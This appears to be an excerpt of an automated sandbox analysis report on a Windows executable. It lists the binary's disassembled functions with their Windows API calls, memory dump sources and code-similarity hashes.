                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 005FDAB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 4072794657-3128320259
                                                  • Opcode ID: 6db913738a3e127145164f2efce319709a7b271019d7dffef74615209d985286
                                                  • Instruction ID: d7b9e9d09100ba744b5955d369183b783e603855b39fd00e6cb0aa015a084600
                                                  • Opcode Fuzzy Hash: 6db913738a3e127145164f2efce319709a7b271019d7dffef74615209d985286
                                                  • Instruction Fuzzy Hash: 440186F250020C7FE710ABA4DD89EFB376DEB08311F405492B746E2141E6749E858F74
                                                  Function 0060096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(0162D130,0162D130), ref: 0060097B
                                                  • EnterCriticalSection.KERNEL32(0162D110,00000000), ref: 0060098D
                                                  • TerminateThread.KERNEL32(0162D128,000001F6), ref: 0060099B
                                                  • WaitForSingleObject.KERNEL32(0162D128,000003E8), ref: 006009A9
                                                  • CloseHandle.KERNEL32(0162D128), ref: 006009B8
                                                  • InterlockedExchange.KERNEL32(0162D130,000001F6), ref: 006009C8
                                                  • LeaveCriticalSection.KERNEL32(0162D110), ref: 006009CF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: e1184cf600fde6127ca3f2885d1500d8652b91b9ef8261ecdbd8c4cefb8219a6
                                                  • Instruction ID: a5b979d6b9742f947cb6afa2ac65c7a480640dfcb25864083532b17c2e45f0f0
                                                  • Opcode Fuzzy Hash: e1184cf600fde6127ca3f2885d1500d8652b91b9ef8261ecdbd8c4cefb8219a6
                                                  • Instruction Fuzzy Hash: 1BF01D31442D02EBE7655B94EE8DBDA7A26BF01712F503015F101548A0CB749566DF90
                                                  Function 005C01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __allrem.LIBCMT ref: 005C00BA
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C00D6
                                                  • __allrem.LIBCMT ref: 005C00ED
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C010B
                                                  • __allrem.LIBCMT ref: 005C0122
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C0140
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                  • Instruction ID: 53ac885b77e640447a526f8ebda01f8bb84f81467d18f68a716d919263fbc0ad
                                                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                  • Instruction Fuzzy Hash: D381C475A00B06AFE7249EA8CC46FAABBE9FF81724F24452EF551D62C1E770E9408750
                                                  Function 005C61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005B82D9,005B82D9,?,?,?,005C644F,00000001,00000001,8BE85006), ref: 005C6258
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005C644F,00000001,00000001,8BE85006,?,?,?), ref: 005C62DE
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005C63D8
                                                  • __freea.LIBCMT ref: 005C63E5
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  • __freea.LIBCMT ref: 005C63EE
                                                  • __freea.LIBCMT ref: 005C6413
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: 5ec364c16197bcd2c2c9387d47df11b749625436630ca590a9a8457d86ba93d3
                                                  • Instruction ID: 0eed0ba23fff481260b7527e5dd743aa6e6e94c5e8ec5abb4559dc3546aafeb9
                                                  • Opcode Fuzzy Hash: 5ec364c16197bcd2c2c9387d47df11b749625436630ca590a9a8457d86ba93d3
                                                  • Instruction Fuzzy Hash: E0518D72600256AFEB258FA4DC85FAF7EAAFB84B50F154A2DF805D7181DB34DE40C660
                                                  Function 0061BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061BCCA
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061BD25
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061BD6A
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0061BD99
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0061BDF3
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061BDFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                  • String ID:
                                                  • API String ID: 1120388591-0
                                                  • Opcode ID: 9ea760e7ec91e6d2f18cf5f1d5154719084a4f778fdb8b65b0b236bc869bd5ee
                                                  • Instruction ID: e90a95a443832cde03b86c53635b11e060349699d1bbf83af0cb9cd2e0cef655
                                                  • Opcode Fuzzy Hash: 9ea760e7ec91e6d2f18cf5f1d5154719084a4f778fdb8b65b0b236bc869bd5ee
                                                  • Instruction Fuzzy Hash: 0481A230208241EFD714DF24C895EAABBE6FF84308F18995CF4558B2A2DB31ED45CB92
                                                  Function 005EF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000035), ref: 005EF7B9
                                                  • SysAllocString.OLEAUT32(00000001), ref: 005EF860
                                                  • VariantCopy.OLEAUT32(005EFA64,00000000), ref: 005EF889
                                                  • VariantClear.OLEAUT32(005EFA64), ref: 005EF8AD
                                                  • VariantCopy.OLEAUT32(005EFA64,00000000), ref: 005EF8B1
                                                  • VariantClear.OLEAUT32(?), ref: 005EF8BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                  • String ID:
                                                  • API String ID: 3859894641-0
                                                  • Opcode ID: eec3421c96f30b34c5df34a0ffb9e32162f79d2d3602d25872eb9acdbf98cf53
                                                  • Instruction ID: f2e4513af012988c72205502151bcd666c58c0c716a8e0d499f0736048a8b741
                                                  • Opcode Fuzzy Hash: eec3421c96f30b34c5df34a0ffb9e32162f79d2d3602d25872eb9acdbf98cf53
                                                  • Instruction Fuzzy Hash: 6F51DA31900751BADF286F66D89972D7BA9FF85310F205466E885DF192DF708C40C766
                                                  Function 0060910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 006094E5
                                                  • _wcslen.LIBCMT ref: 00609506
                                                  • _wcslen.LIBCMT ref: 0060952D
                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00609585
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$FileName$OpenSave
                                                  • String ID: X
                                                  • API String ID: 83654149-3081909835
                                                  • Opcode ID: 5fdcaf1dc5dd5d667482c6972ae8867973cc80df5ff0233345f7199633c7c297
                                                  • Instruction ID: 39f0582ad90e7a3e4c206c3be50781b8d4a6d2b03b08a0ba30eaeb2766de5ea6
                                                  • Opcode Fuzzy Hash: 5fdcaf1dc5dd5d667482c6972ae8867973cc80df5ff0233345f7199633c7c297
                                                  • Instruction Fuzzy Hash: 20E182715043018FDB18DF24C885AABBBE6BFC5314F14896DE8999B3A2DB31DD05CBA1
                                                  Function 005A920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • BeginPaint.USER32(?,?,?), ref: 005A9241
                                                  • GetWindowRect.USER32(?,?), ref: 005A92A5
                                                  • ScreenToClient.USER32(?,?), ref: 005A92C2
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005A92D3
                                                  • EndPaint.USER32(?,?,?,?,?), ref: 005A9321
                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005E71EA
                                                    • Part of subcall function 005A9339: BeginPath.GDI32(00000000), ref: 005A9357
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                  • String ID:
                                                  • API String ID: 3050599898-0
                                                  • Opcode ID: d24a48feaf0d4ac960e407ebe08eb5dec6c6b9ca9eaacfe9e193677e1ff60aa1
                                                  • Instruction ID: 32f285b614262e6bb4ecded8e876705aaffbd35a41ed65e103a02217c14e4855
                                                  • Opcode Fuzzy Hash: d24a48feaf0d4ac960e407ebe08eb5dec6c6b9ca9eaacfe9e193677e1ff60aa1
                                                  • Instruction Fuzzy Hash: 6B41B030104311AFDB20DF25CC89FAA7FB9FF8A720F140629F9948B1A1C7719845DB62
                                                  Function 006007EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0060080C
                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00600847
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00600863
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 006008DC
                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006008F3
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00600921
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3368777196-0
                                                  • Opcode ID: 548849faaafb6200cd442bbda44b620f8315aa23997cb78cd28005fbd1b8e3af
                                                  • Instruction ID: 4034a7391e9e0afeb7e6d1dbe4e7708b46869f1d7dbc59737ff0333ecc12bec4
                                                  • Opcode Fuzzy Hash: 548849faaafb6200cd442bbda44b620f8315aa23997cb78cd28005fbd1b8e3af
                                                  • Instruction Fuzzy Hash: A4414C71900206EFEF149F94DC85AAA7BB9FF44310F1480A5ED009A297DB30EE65DBA4
                                                  Function 006281DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,005EF3AB,00000000,?,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 0062824C
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00628272
                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006282D1
                                                  • ShowWindow.USER32(00000000,00000004), ref: 006282E5
                                                  • EnableWindow.USER32(00000000,00000001), ref: 0062830B
                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0062832F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 635bcd9824adf142e61ef1cf8fc2febf4921d2985c9e4a64e776eff957f5f5fa
                                                  • Instruction ID: 76f93f7fc8413236dc723d8784c5dfb29a993f54db0f088100f8579cac3d04aa
                                                  • Opcode Fuzzy Hash: 635bcd9824adf142e61ef1cf8fc2febf4921d2985c9e4a64e776eff957f5f5fa
                                                  • Instruction Fuzzy Hash: 3A418334603A54EFDB21CF55EC99BE47BE2BB0A714F185269E5084F362CB71A941CF90
                                                  Function 005F4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 005F4C95
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005F4CB2
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005F4CEA
                                                  • _wcslen.LIBCMT ref: 005F4D08
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005F4D10
                                                  • _wcsstr.LIBVCRUNTIME ref: 005F4D1A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                  • String ID:
                                                  • API String ID: 72514467-0
                                                  • Opcode ID: 084a98b0ac1861260481218b9710100e8c9b24766cc4df4bbedc6409b70f8ec7
                                                  • Instruction ID: 5997bd331c173562f578ca260dd03756e68e4f480667866bac567bac1ada3bf9
                                                  • Opcode Fuzzy Hash: 084a98b0ac1861260481218b9710100e8c9b24766cc4df4bbedc6409b70f8ec7
                                                  • Instruction Fuzzy Hash: 3921F632204205BBEB255B79AC49E7F7FDDEF85760F108029F905CA192EA65DC019BA0
                                                  Function 0060581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                  • _wcslen.LIBCMT ref: 0060587B
                                                  • CoInitialize.OLE32(00000000), ref: 00605995
                                                  • CoCreateInstance.OLE32(0062FCF8,00000000,00000001,0062FB68,?), ref: 006059AE
                                                  • CoUninitialize.OLE32 ref: 006059CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                  • String ID: .lnk
                                                  • API String ID: 3172280962-24824748
                                                  • Opcode ID: b0fd139eebacf74bdd8a9bf710f9d2f88ac7c048255d10fe80a3fb4e80d40eb4
                                                  • Instruction ID: 74d19632f5a8d7126d112a9ae3ff2b4f7f1edf84dd81b9308f5ef761d798e5f9
                                                  • Opcode Fuzzy Hash: b0fd139eebacf74bdd8a9bf710f9d2f88ac7c048255d10fe80a3fb4e80d40eb4
                                                  • Instruction Fuzzy Hash: 88D141716086019FCB18DF24C49496BBBE6FF89710F158859F88A9B3A1DB31EC45CF92
                                                  Function 005F175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005F0FCA
                                                    • Part of subcall function 005F0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005F0FD6
                                                    • Part of subcall function 005F0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005F0FE5
                                                    • Part of subcall function 005F0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005F0FEC
                                                    • Part of subcall function 005F0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005F1002
                                                  • GetLengthSid.ADVAPI32(?,00000000,005F1335), ref: 005F17AE
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005F17BA
                                                  • HeapAlloc.KERNEL32(00000000), ref: 005F17C1
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 005F17DA
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,005F1335), ref: 005F17EE
                                                  • HeapFree.KERNEL32(00000000), ref: 005F17F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
